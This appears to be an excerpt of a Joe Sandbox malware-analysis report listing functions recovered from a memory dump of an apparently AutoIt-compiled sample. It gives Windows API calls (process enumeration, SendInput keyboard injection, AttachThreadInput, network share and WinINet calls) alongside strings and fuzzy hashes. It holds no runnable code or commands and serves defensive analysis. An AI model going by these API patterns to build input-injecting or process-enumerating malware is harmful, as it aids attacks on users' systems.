Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 7b23defe2d2c30b45d3932ce026b827a7bb13094529bd11edeb05427f580be22
Instruction ID: fc991e07acde005aba084862bffa114540eb76c8dd8c06c6d3b8c0b66457e0b8
Opcode Fuzzy Hash: 7b23defe2d2c30b45d3932ce026b827a7bb13094529bd11edeb05427f580be22
Instruction Fuzzy Hash: 52518C71608300AFD710EF24CC85A6BBBE9FF89714F04891EF98597291EB34D904DB92

Function 01066278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 010662E2
ScreenToClient.USER32(?,?), ref: 01066315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 01066382

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 78bd10334bc338c3717cd88c91d67b2c0c07ba3b8fe0197d02035ae175a432b5
Instruction ID: c22415acc0d59cad8f802b3d1f2573315e609fc22ba4bea4ab0e618e4fe37c26
Opcode Fuzzy Hash: 78bd10334bc338c3717cd88c91d67b2c0c07ba3b8fe0197d02035ae175a432b5
Instruction Fuzzy Hash: 34518F70A00619EFDF21DF58D8809AE7BFAFF45360F108199F9959B291D732E941CB50

Function 0103AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0103AAAC
SetKeyboardState.USER32(00000080), ref: 0103AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0103AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0103AB88

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 8ea29d66e474d9b29fb2139193b4d06f966f4662004aae7de7a13cec5cd27f32
Instruction ID: 7b187cad42330b3dc0337898244af3011073b3d0482e2b3841b8b39ded58d0b2
Opcode Fuzzy Hash: 8ea29d66e474d9b29fb2139193b4d06f966f4662004aae7de7a13cec5cd27f32
Instruction Fuzzy Hash: 5631E531B40248EEFF398A698804BFA7BEEABC5310F044A5AE5C1D71D2D3799581C765

Function 01062782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0106280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 01062824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 01062832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 01062840

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: c41adb4273bf84d63fa00043bf6425c5c77442e8b01134693b910684d477818a
Instruction ID: 1193ca5c2cdab0838c5092488acfeb9d05eb89f46ef1dfcc0e6f16faa9af26d1
Opcode Fuzzy Hash: c41adb4273bf84d63fa00043bf6425c5c77442e8b01134693b910684d477818a
Instruction Fuzzy Hash: 1421C131205112AFE7149B24CC44FAA7B99AF45324F198159F4A68B6E2C77AEC82C7D0

Function 0103E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0103E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0103E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0103E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0103E24D

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 7e5325b9fbe69f89d403eb7642ea0b9aa544189a7903912d90d99b0c39eee3dd
Instruction ID: 19b47b52b44b8211515cd464d98accccaf27ef626461038d2571f84c99324e93
Opcode Fuzzy Hash: 7e5325b9fbe69f89d403eb7642ea0b9aa544189a7903912d90d99b0c39eee3dd
Instruction Fuzzy Hash: FC11DB76904258BFD7219FACDC05A9E7FADAF85310F048355F994D3284D6B9D90487A0

Function 00FD600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FD604C
GetStockObject.GDI32(00000011), ref: 00FD6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 00FD606A

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 75c3d9ac082bcae54f8f41cd129e2cf69092170c40a390e5c7315318c6d93504
Instruction ID: b3d8886e4b6f6c94510251931b1641330a7238188c1c3cd0e3351fe2cfaf3ad6
Opcode Fuzzy Hash: 75c3d9ac082bcae54f8f41cd129e2cf69092170c40a390e5c7315318c6d93504
Instruction Fuzzy Hash: BB116172501549BFEF225F949C48EEA7B6AFF0D364F040116FA5492114D73ADC60EB90

Function 01032DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 01032DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 01032DD6
GetCurrentThreadId.KERNEL32 ref: 01032DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 01032DE4

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 4e803fa2c80d57d1e98ac941e7935ead9eb480db8d395605be86cbeb3e93188b
Instruction ID: 73a3f9d7e55b3ca333c793ac5c179e1f23d3b46b35a4ca7c7c049a0643354749
Opcode Fuzzy Hash: 4e803fa2c80d57d1e98ac941e7935ead9eb480db8d395605be86cbeb3e93188b
Instruction Fuzzy Hash: 94E09271101224BBEB302A779D0DFEB7E6CEF87BA1F000015F286D50809AAAD840C7B0

Function 01068863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00FE9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FE9693
Part of subcall function 00FE9639: SelectObject.GDI32(?,00000000), ref: 00FE96A2
Part of subcall function 00FE9639: BeginPath.GDI32(?), ref: 00FE96B9
Part of subcall function 00FE9639: SelectObject.GDI32(?,00000000), ref: 00FE96E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 01068887
LineTo.GDI32(?,?,?), ref: 01068894
EndPath.GDI32(?), ref: 010688A4
StrokePath.GDI32(?), ref: 010688B2

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 624d001936c75fd6432ef09585851636bb0b1f4b15db1a70d3414069e2ed98e0
Instruction ID: afa714b8b61f41487ab1438ade8b441dc46d5a65529f194cc3af9a0338dd5221
Opcode Fuzzy Hash: 624d001936c75fd6432ef09585851636bb0b1f4b15db1a70d3414069e2ed98e0
Instruction Fuzzy Hash: FFF05E36045658BAFB226F94AD09FCE3F59AF0A310F048141FB91650E5C7BA5111DFE5

Function 01044D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD7620: _wcslen.LIBCMT ref: 00FD7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 01044ED4

Strings

*, xrefs: 01044E10
LPT, xrefs: 01044DFB

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 45ed498e046e843ebfae2130ce1de4d19140b5aa1c789fec511f08f003511948
Instruction ID: 5616581edc966602fbcdb0566b640a3b3d5c3ea00f8f5e3a776f83ca54799d88
Opcode Fuzzy Hash: 45ed498e046e843ebfae2130ce1de4d19140b5aa1c789fec511f08f003511948
Instruction Fuzzy Hash: D3916FB5A042049FDB15DF58C8C4FAABBF1AF44304F1980A9E84A9F362D735ED85CB91

Function 00FFE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00FFE30D

Strings

pow, xrefs: 00FFE2E5, 00FFE302

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: b3fdecc7554f1b31e655849d335909f8f2fe2003bee11e0426d719eab86f8815
Instruction ID: eb123f7609eb0937f82f34d43529614e7c0b57355d1c84be3f1fc66907d158a2
Opcode Fuzzy Hash: b3fdecc7554f1b31e655849d335909f8f2fe2003bee11e0426d719eab86f8815
Instruction Fuzzy Hash: C8518E72E0920A96EB277718C9043B93FE4EF50750F204969E1D5422FCEF3D9C95AB46

Function 00FEE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00FEE1B1

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 7d52239c26b51028eda69f9041a7b39a50a4795a27a14a204b34d9077f02536d
Instruction ID: d25bc105b9278c3d7049c8d9f6432819f368e46d3b3e3cb50a9023e9f0f7e81d
Opcode Fuzzy Hash: 7d52239c26b51028eda69f9041a7b39a50a4795a27a14a204b34d9077f02536d
Instruction Fuzzy Hash: B4517235A44296DFEF15DF68D4806BA7BA4FF05310F248096E9C19B2D0D6389D42DBA0

Function 01064537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 0106461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01064634

Strings

', xrefs: 0106458E

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: d68ee2e9c29d2845298a16d990c57516a536e9b525fbfe8e841a3e7e9281ef5d
Instruction ID: e0801c4a699bed0bf6624d972cfb488d1e9cc74d273aff77eb4c9c67b17ebd72
Opcode Fuzzy Hash: d68ee2e9c29d2845298a16d990c57516a536e9b525fbfe8e841a3e7e9281ef5d
Instruction Fuzzy Hash: AE310674A0120AAFDB54CFA9C980ADA7BF9FF49300F14416AEA45EB342D771A941CF90

Function 0104CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0104CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0104CDA6

Strings

<local>, xrefs: 0104CD66

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: c5aa6b000b87ce6d376617803f54bc63139999bdfb93ff4b1f6c0dfd803b240c
Instruction ID: 78e9e37e246de2ed616550a12d5f843f12cbc563380a6d99c1161c9a2981b378
Opcode Fuzzy Hash: c5aa6b000b87ce6d376617803f54bc63139999bdfb93ff4b1f6c0dfd803b240c
Instruction Fuzzy Hash: 0C1106B12026317BE7786A668D84EE7BEACEF026A4F00422AB1C983080D3759440C6F0

Function 01036C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

CharUpperBuffW.USER32(?,?,?), ref: 01036CB6
_wcslen.LIBCMT ref: 01036CC2

Strings

STOP, xrefs: 01036CBC, 01036CC1

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: c27972536f8ad7846dd25a27fef1bde6b2ce1f27ac26d235ebc3d767077fe182
Instruction ID: 960dcd8978e8cf357e70fd57faf32659b876aa30154f9aeff6403499b792b72a
Opcode Fuzzy Hash: c27972536f8ad7846dd25a27fef1bde6b2ce1f27ac26d235ebc3d767077fe182
Instruction Fuzzy Hash: BC010832E1052A9ACB21AFFDDC448BF77F9EA91614B000565E49296195EA37D640C750

Function 01030B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 01030B23

Strings

Error allocating memory., xrefs: 01030B1C
AutoIt, xrefs: 01030B17

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: da0dd42525fab793dd2663b27e94894e71a2ce769f37d6ff77ee94fdbc520c9a
Instruction ID: 6eead795e3612027ea779cc3ef8643bab27495dc083cfdc098e13e687c59f56d
Opcode Fuzzy Hash: da0dd42525fab793dd2663b27e94894e71a2ce769f37d6ff77ee94fdbc520c9a
Instruction Fuzzy Hash: 15E0D83124434C36E32436567D03F897A888F05F20F10442BF7D8995C38ADA245022A9

Function 00FF0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00FEF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FF0D71,?,?,?,00FD100A), ref: 00FEF7CE

IsDebuggerPresent.KERNEL32(?,?,?,00FD100A), ref: 00FF0D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FD100A), ref: 00FF0D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FF0D7F

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: a70f140f35858573a67155f0e4c1b70fe5bdc0166f821d53d6593278f35603c6
Instruction ID: f55ddc6e0259c8ac388cbdf8b67a97e2262a00fa348e7481cb837b88ed893b51
Opcode Fuzzy Hash: a70f140f35858573a67155f0e4c1b70fe5bdc0166f821d53d6593278f35603c6
Instruction Fuzzy Hash: C1E092742007528BE3309FB9E90875A7BE4AF04B44F04892DE9C6C7756DFBAE4449B91

Function 01062322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0106232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0106233F

Part of subcall function 0103E97B: Sleep.KERNEL32 ref: 0103E9F3

Strings

Shell_TrayWnd, xrefs: 01062325

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 5b64c25f4ae78e2588b92b7cd2d8c77b671507061dc3c6a744c021c29acf0103
Instruction ID: 065754b167a40f88ba17c41289aaddedee89bb37441931858c097f6eabfae5fa
Opcode Fuzzy Hash: 5b64c25f4ae78e2588b92b7cd2d8c77b671507061dc3c6a744c021c29acf0103
Instruction Fuzzy Hash: F0D02232390300B7FA74B330EC0FFCABA08AB04B00F000A06B3C6AA1D4C9F5A800CB04

Function 01062356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0106236C
PostMessageW.USER32(00000000), ref: 01062373

Part of subcall function 0103E97B: Sleep.KERNEL32 ref: 0103E9F3

Strings

Shell_TrayWnd, xrefs: 01062365

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 962dba05881bdfb36587e7609565c75362cecdb4c829e92382bd813e88f8a68e
Instruction ID: fa14ebe6dda5564a093d81f50c0751174b859044498ac8e2ce33a0ff10faeef6
Opcode Fuzzy Hash: 962dba05881bdfb36587e7609565c75362cecdb4c829e92382bd813e88f8a68e
Instruction Fuzzy Hash: 26D0C73139131176F6747671DD0EFC675145754710F004516B6C5991D4D5B568418754

